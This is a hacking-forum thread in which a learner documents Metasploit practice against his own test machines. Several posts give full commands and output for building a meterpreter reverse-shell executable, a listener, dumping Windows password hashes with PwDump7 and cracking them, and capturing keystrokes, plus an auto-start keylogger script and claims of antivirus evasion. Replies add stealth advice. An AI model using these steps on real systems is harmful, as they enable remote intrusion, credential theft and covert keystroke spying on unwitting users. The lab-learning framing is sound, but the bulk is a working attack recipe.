Page 1 of 13 12311 ... LastLast
Results 1 to 10 of 123

Thread: Pentesting Documentation

  1. #1
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default Pentesting Documentation

    I'm going to use this thread to document my progress using BT3 or any of the tools that are contained in BT3 but are being used with my Ubuntu distro. I'm going to try to post videos/detailed descriptions of any of the problems or successes that I have.

    The first step is deciding what OS I want my victim computer to run. I have an old Toshiba Satellite Pro 4200 series, It can run either XP SP2 or DSL (damn small linux) or maybe I will try an older more vulnerable version of Ubuntu. I'm thinking that I would like it to run XP SP2 just because its a more popular OS but from some of the reading I've done alot of the exploits have been patched up.

    What option do you think will be the most beneficial/fun to use as the "victims" OS?

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by AnActivist View Post
    What option do you think will be the most beneficial/fun to use as the "victims" OS?
    Vmware with all of them at the same time.
    Make sure the host is secure though and up to date.
    Then you can start from there.
    Also if you can afford a couple more machines as time goes along you can setup different things on them as well.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    Quote Originally Posted by AnActivist View Post
    I'm going to use this thread to document my progress using BT3 or any of the tools that are contained in BT3 but are being used with my Ubuntu distro. I'm going to try to post videos/detailed descriptions of any of the problems or successes that I have.

    The first step is deciding what OS I want my victim computer to run. I have an old Toshiba Satellite Pro 4200 series, It can run either XP SP2 or DSL (damn small linux) or maybe I will try an older more vulnerable version of Ubuntu. I'm thinking that I would like it to run XP SP2 just because its a more popular OS but from some of the reading I've done alot of the exploits have been patched up.

    What option do you think will be the most beneficial/fun to use as the "victims" OS?
    I would suggest the De-ICE Live CD sets. They are well known, have some built-in vulnerabilities designed for pen testing and there is help on the Heorot.Net forums (the home of the De-ICE sets) if you get stuck.

    Damn Vulnerable Linux (DVL) is another option.
    Thorn
    Stop the TSA now! Boycott the airlines.

  4. #4
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by Thorn View Post
    I would suggest the De-ICE Live CD sets. They are well known, have some built-in vulnerabilities designed for pen testing and there is help on the Heorot.Net forums (the home of the De-ICE sets) if you get stuck.

    Damn Vulnerable Linux (DVL) is another option.
    De-ice cd's are good learning tools indeed. But don't read the spoilers.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #5
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    Quote Originally Posted by archangel.amael View Post
    De-ice cd's are good learning tools indeed. But don't read the spoilers.
    Well, only if you get really stuck.
    Thorn
    Stop the TSA now! Boycott the airlines.

  6. #6
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default

    Thank you to everyone for all the feedback, I tried to get Vmware up and running on my laptop but its just too old with not enough memory. With Vmware running my computer lags then crashes. As of right now I have a fresh install of Windows XP SP2 with not anti virus yet. This is my first documented experience. There are much more advanced ways to perform these tasks but being new I decided to try to simply the process as much as possible. There are also a lot of tutorials on this but I don't think adding one more will hurt. Finally, this is really to help me learn, so if you see any errors please let me know so I can fix them.

    Goal: Use Metasploit to get into victims computer, get hashes, and crack them.
    Victim Specs: Windows XP SP2, no anti virus
    Attacker Specs: Ubuntu 8.10, Metasploit v3.2, John the Ripper
    Links/Tuts/Authors to be credited:
    John Strand Metasploit Meterpreter Reverse exe,
    pureh@te XP Passwords

    I had trouble finding an exploit for actually getting into to windows box because it is SP2 so instead I made my payload into an .exe file that would be executed by the victim.

    The payload that I used was the windows/meterpreter/reverse_tcp. This payload injects the meterpreter server DLL into the victim and then connects back to the attack via the attacker's IP and Port. To turn this into an executable you can use the following command:
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.xxx LPORT=4444 X > MSPAYLOAD.exe
    If all goes well you should see something like this:
    Code:
    Created by msfpayload ().
    
    Payload: windows/meterpreter/reverse_tcp
    
     Length: 278
    
    Options: LHOST=192.168.1.xxx,LPORT=4444
    A couple important notes:
    1.Make sure that you have navigated to the Metasploit Framework directory before issuing the above command, or instead of just issuing ./msfpayload you issue something like /home/username/framework-3.2/msfpayload
    2.You can check your local ip by using the
    Code:
    ifconfig
    command. Be aware that the whole point of this is that the victim will be connecting to YOU so you have to use YOUR ip.
    3.Take a note of the LPORT this is again the port the victim will be connecting to; you need to remember this so you can listen on it later.
    4.Don't forget the
    Code:
     X
    towards the end of the command, without it the payload won't be turned into an executable.

    Alright so now we have our executable. This executable needs to be executed by the victim that we want to connect to to ourselves. You can use a lot of different creative ways to achieve this. A couple could be sending it via email, use netcat or ssh. To simply the process I just used a usb flash drive. All I did was copy MSPAYLOAD.exe to the flash drive and then from there copied it to the victims computer. One important note is that when I tried this on a computer with Avast AV it freaked out; my victim box doesn't have an AV (anti virus) yet so it wasn't a problem but if it is for you just disable the AV or try to figure out how to get past it (this is possible). Note: don't execute the executable yet.

    So now we have created our executable and its on the victim's box. The next step is to start listening on the LPORT that we specified in our executable for the meterpreter that will be sent. We can do this using the exploit/multi/handler module. This module will allow us to wait for for our payload/exploit/executable to be launched outside the framework. To do this first start up the msfconsole, you can do this with
    Code:
     ./msfconsole
    . Once the console has been started up issue the following command:
    Code:
    use exploit/multi/handler
    If you were successful you should see the
    Code:
    msf >
    prompt change to
    Code:
     msf exploit(handler) >
    Now we need to set up our payload to listen for the meterpreter that will be sent from the victim's box once they execute the MSPAYLOAD.EXE. Issue the following command:
    Code:
     set PAYLOAD windows/meterpreter/reverse_tcp
    then set you LHOST and LPORT
    Code:
    msf exploit(handler) > set LHOST 192.168.1.xxx
    
    LHOST => 192.168.1.100
    
    msf exploit(handler) > set LPORT 4444
    
    LPORT => 4444
    Once again make sure you note that this is your ip and that the port you are listening on must match the port that MSPAYLOAD.EXE will be sending the meterpreter to. Once you have checked that everything is in order issue the command
    Code:
    exploit
    . If all goes well it should look like this:
    Code:
     msf exploit(handler) > exploit
    [*] Starting the payload handler...
    [*] Started reverse handler
    Now we are ready to execute MSPAYLOAD.EXE on the victims box. Execute MSPAYLOAD.EXE or whatever your .exe file is named on the victim's box now. If you have done everything correctly so far then not much should happen on the victims box but on yours something magical has happened. Your msfconsole should now look like this:
    Code:
    msf exploit(handler) > exploit
    
    
    [*] Starting the payload handler...
    [*] Started reverse handler
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.1.xxx:4444 -> 192.168.1.103:1030)
    
    meterpreter >
    Note: If you meterpreter session doesn't open right away you can check for active sessions by typing “sessions -l” and then using the particular ID of the active session type “sessions -i (ID number)”

    Now you are in. You can check the processes that are running on the victim's computer by issuing the
    Code:
     ps
    command and you should see MSPAYLOAD.EXE or whatever you named you executable nestled in there.

    Now we need to upload some files onto our victims computer. The two files that we will be upload are PwDump7.exe and libeay32.dll. We can do this by issuing the following commands:
    Code:
    upload /home/username/PwDump7/PwDump7.exe C:\\PwDump7.exe
    
    upload /home/username/PwDump7/libeay32.dll C:\\libeay32.dll
    If you are successful your msfconsole should look like this:
    Code:
    meterpreter > upload /home/max/PwDump7/PwDump7.exe C:\\PwDump7.exe
    [*] uploading  : /home/max/PwDump7/PwDump7.exe -> C:\PwDump7.exe
    [*] uploaded   : /home/max/PwDump7/PwDump7.exe -> C:\PwDump7.exe
    
    meterpreter > upload /home/max/PwDump7/libeay32.dll C:\\libeay32.dll
    [*] uploading  : /home/max/PwDump7/libeay32.dll -> C:\libeay32.dll
    [*] uploaded   : /home/max/PwDump7/libeay32.dll -> C:\libeay32.dll
    Some important notes:
    1.The directory that PwDump7.exe and libeay32.dll is located on my be different for you
    2.You can download PwDump7 from

    Now that we have our important files uploaded onto the victims computer we need to run PwDump7 but first we need to get a command prompt. To do this issue the following command:
    Code:
      execute -f cmd.exe -c -H -i
    If you are successful your msfconsole should have warped and now looks something like this:
    Code:
    meterpreter > execute -f cmd.exe -c -H -i
    
    Process 1644 created.
    
    Channel 3 created.
    
    Microsoft Windows XP [Version 5.1.2600]
    
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\>
    Now we want to execute PwDump7 and we want it to dump the hash into a text file that I will name XPHASH.txt. You can do this by issuing the following command:
    Code:
    PwDump7 > XPHASH.txt
    If you are successful your command prompt should look like this:
    Code:
    C:\>PwDump7 > XPHASH.txt
    
    PwDump7 > XPHASH.txt
    
    Pwdump v7.1 - raw password extractor
    
    Author: Andres Tarasco Acuna
    
    C:\>
    You can now exit the command prompt and get back into the meterpreter (this will happen automatically if you simply type “exit”). Once inside the meterpreter we want to download the newly created hash XPHASH.txt onto our computer so we can crack it with John the Ripper. You can download XPHASH.txt to your computer by issuing the following command:
    Code:
    download C:\\XPHASH.txt /home/username/Desktop/XPHASH.txt
    If you are successful your msfconsole should look like this:
    Code:
    meterpreter > download C:\\XPHASH.txt /home/max/Desktop/XPHASH.txt
    [*] downloading: C:\XPHASH.txt -> /home/username/Desktop/XPHASH.txt
    [*] downloaded : C:\XPHASH.txt -> /home/username/Desktop/XPHASH.txt
    Now you can exit disconnect from the victim's box because we have everything we need. The final step is to use John the Ripper to crack XPHASH.txt.

    To crack XPHASH.txt you can issue the following command:
    Code:
     john -f:NT –wordlist=/home/username/Desktop/wordlist.txt /home/username/Desktop/XPHASH.txt
    Note:
    1.wordlist.txt can be downloaded for John the Ripper, just Google for JtR wordlists downloads
    2.Your directories may be different than mine
    3.If you want to do this only for testing purposes then you could just make a wordlist with the actual passwords of the box just to see if it works (this is what I did).

    Thats it for me. I hope this helps some people. Like I said before please point out errors so that I can fix them. I'm going to explore the password cracking process more and try to do this again, I'm also going to try to get past my AV, and explore new ways to get the .exe file onto the victims computer.

    last note: I wasn't able to post any urls because I don't have enough posts, just Google if you want websites.

  7. #7
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default

    Alright well I didn't quite make the full leap to using BT3 as my main OS but I did finally get the dual boot working. The whole experience was pretty intense and really showed me how I'm still clinging a little bit too tightly to MS and their pretty yet tacky GUIs. Just a tip for anyone reading, I think that it is easier to just erase the entire HDD then install BT and then install/partition with Ubuntu, no need to go completely into as many others have.

    The real interesting news is BigMac's video. I've used his method successfully (via his really well put together video) on my test box that is running XP SP2. I'm still going to work on double encoding and then try to see if I can get a keylogger working.

    Introduction:

    After following BigMac's tutorial I can get a meterpreter session on my test box (XP SP2) every time the computer restarts. I heard about the key logger functionality that the meterpreter has so did some reading about it. I read the following: **I can't post urls but its on the Metasploit blog** (just scroll down until you see the blog about keysniffing). I wanted to try to test it out so I started up the msfconsole and started waiting on my forwarded port and then booted up my test box...

    Testing:

    Code:
    msf exploit(handler) > jobs
    
    Jobs
    ====
    
      Id  Name
      --  ----
      0   Exploit: multi/handler
    
    msf exploit(handler) >
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Killing Antivirus services on the target...
    [*] Meterpreter session 1 opened (xxx.xxx.x.xxx:xxx -> xxx.xxx.xxx.xxx:xxx)
    
    sessions -l
    
    Active sessions
    ===============
    
      Id  Description  Tunnel
      --  -----------  ------
      1   Meterpreter  xxx.xxx.x.xxx:xxx -> xxx.xxx.xxx.xxx:xxx
    
    msf exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter >
    If you go to the darkoperator blog that is linked in the above page there is this quote:
    Now when you use Meterpreter as a payload you will get in the stdapi the ability to start Keystroke Login by running a simple set of commands
    To me this means that the meterpreter session that I had just started would be sufficient enough to use the key logger. I typed in "help" to see if the commands were accessible...
    Code:
    Stdapi: User interface Commands
    ===============================
    
        Command        Description
        -------        -----------
        enumdesktops   List all accessible desktops and window stations
        idletime       Returns the number of seconds the remote user has been idle
        keyscan_dump   Dump they keystroke buffer
        keyscan_start  Start capturing keystrokes
        keyscan_stop   Stop capturing keystrokes
        setdesktop     Move to a different workstation and desktop
        uictl          Control some of the user interface components
    
    meterpreter >
    I was pretty disappointed to see that I didn't have the "grabdesktop" command that according to both blogs was needed for keyboard sniffing...

    I decided to try to move on and try to go on without it and migrate the Explorer.exe...
    note: 2004 is the pid of Explorer.exe
    Code:
    meterpreter > migrate 2004[*] Migrating to 2004...
    [*] Migration completed successfully.
    meterpreter >
    I then tried to start the keyscan with "keyscan_start". After that I opened up notepad on the test box and proceeded to pretend to log into a gmail account. (Note: The account and password are both fictional, also both the fictional password and email account were typed into notepad to simulate logging into gmail, this was done to prevent any infringement) After that I tried to dump the keys with "keyscan_dump"...
    Code:
    meterpreter > keyscan_start
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    xxxgmail.xxx <Return> victimxgmail.xxx <Tab> t1sp4ssw0rdw0uldbeh4rdt0cr4ck <Return>
    meterpreter >
    Success! You can see that the victim's gmail account was victim@gmail. com and the password was t1sp4ssw0rdw0uldbeh4rdt0cr4ck.

    Note: After exiting the meterpreter sesssion the test box get a Windows Explorer error and had to restart. I tried to get around this by migrating to a different process but this just causes a different error.

    But now lets try it without migrating. This time I did the exact same thing as before: listen on forwarded port, start meterpreter sessions execpt now I did not migrate to Explorer.exe....
    Code:
    meterpreter > keyscan_start
    Starting the keystroke sniffer...
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    xxx.gmail.xxx <Return> victim2@gmail.xxx <Tab> thisisthesecondpassword <Return>
    meterpreter >
    Hmmm success again? This time gmail account is victim2@gmail. com password is thisisthesecondpassword.
    Note: There was no exiting error.

    Concluding Questions:

    After this test I'm left with 3 questions:
    1. Where is my missing Stdapi: User interface Commands?
    2. How do I get around the error that comes up on the victim's computer when I exit the meterpreter session after migrating to Explorer.exe?
    3. Why does this still the keylogger obviously work (in this case) even though there are two missing parts: First using "grabdesktop" and second migrating to Explorer.exe?

    Hypothesis':

    1. Has something to do with the victim box being on my LAN.
    2. Has something to do with the victim's account having administrative access.
    3. The Metasploit team updated something.

    Looking forward to some feedback . Please feel free to test my method and show results

  8. #8
    Junior Member AnActivist's Avatar
    Join Date
    Apr 2009
    Posts
    77

    Default

    Follow up for using the key sniffing functionality with the meterpreter in Metasploit:

    My girlfriend who uses runs Windows Vista agreed to run a pentest with me. While I was at it I also tested out BigMac's method of making payload executables that are undetectable by AVs (she uses Macafee) and it was completely undetectable!

    Testing specs:
    Victim: Windows Vista with Macafee AV
    Attacker: BT3 Final
    Both computers have different IPs and are not on the same LAN

    Testing:
    After getting a active meterpreter session with the victim I proceeded to start sniffing for keystrokes with the "keyscan_start" command. Its important to note that I did not migrate processes or use the "grabdesktop" command. We then proceeded to do the same test as bellow except on her computer. She opened a text file typed "w ww.gmail.c om" followed by a fictional email account and a fictional password. I then dumped the key strokes with the "keyscan_dump" command and could see exactly what she had typed in plain text.

    Concluding Questions:

    Because everything when normally I am still left with the same three questions:
    1. Where is my missing Stdapi: User interface Commands?
    2. How do I get around the error that comes up on the victim's computer when I exit the meterpreter session after migrating to Explorer.exe?
    3. Why does this still the keylogger obviously work (in this case) even though there are two missing parts: First using "grabdesktop" and second migrating to Explorer.exe?

    Hypothesis:

    What is exciting about this test is that I was able to eliminate two of my three hypothesis; first it has nothing to do with the LAN (for obvious reasons), two it doesn't have to do with Administrative access (her account did not have administrative privileges), and a third that I hadn't asked: it doesn't have to do with XP because she is running Vista.

    This leaves me with one last hypothesis:
    3. The Metasploit team updated something.
    Although its strange because I haven't read anything about it in their blog.

    Anyways I think it was a very valuable test, I'll be searching for more information and will be updating. I'm not sure if this is interesting enough for a tutorial especially since its so simple but I wouldn't mind helping out (as so many other people are posting videos and I haven't seen one about this) and making a video about it if people are interested.

    If anyone tries this and they see another reason why its working for me and not for them, or have any other answers to the above questions; I'd really like to know.

    Cheers

    Automatically start sniffing keys:

    There is a script that is in the trunk/scripts/meterpreter directory called keylogrecorder.rb; the point of this script is to dump the key strokes into a database. I'm trying to fully understand how this works but from reading over the source code I was able to make my own script (probably the smallest one of all time) that will automatically execute the "keyscan_start" command. I then set the script to be run automatically also:
    Code:
    set AutoRunScript /root/Desktop/exploits/SCRIPTS/sniffKEYS.rb
    This makes it possible to automatically start sniffing for key strokes as soon as the victim executes the payload that has been turned into an executable, in this case meta.exe.

    I'm still trying to learn about making more useful scripts. Especially trying to do things like move or delete files on the "victim's" box.

    This is what my sniffKEYS.rb script looks like its not much but it gets the job done.
    Code:
    print_status("Starting the keystroke sniffer...")
     session.ui.keyscan_start
    Concluding Questions:

    1. Where is there more information about how to write scripts that automate meterpreter events?
    2. Where is there more informations about how to write scripts that automate windows events?

    I should have a follow-up post soon after doing some more research but if anyone already has the answers it would be much appreciated.

  9. #9
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    First of all great that someone is learning on his own and sharing his results and thoughts.

    Something to think about: You mentioned that the keylogger gets executed everytime the executable containing the payload is executed. But that would require it to be executed either manually by the victim or automatically. That is kind of noisy on a system. You could/should think of other ways too
    Tiocfaidh ár lá

  10. #10
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Something else to think about that I have since learned is that using meterpreters password hash function is much safer thean pwdump because it was designed not to "Touch the disc" like pwdump does.

    http://www.metasploit.com/data/antif...c_Analysis.pdf

    See slide 29

Page 1 of 13 12311 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •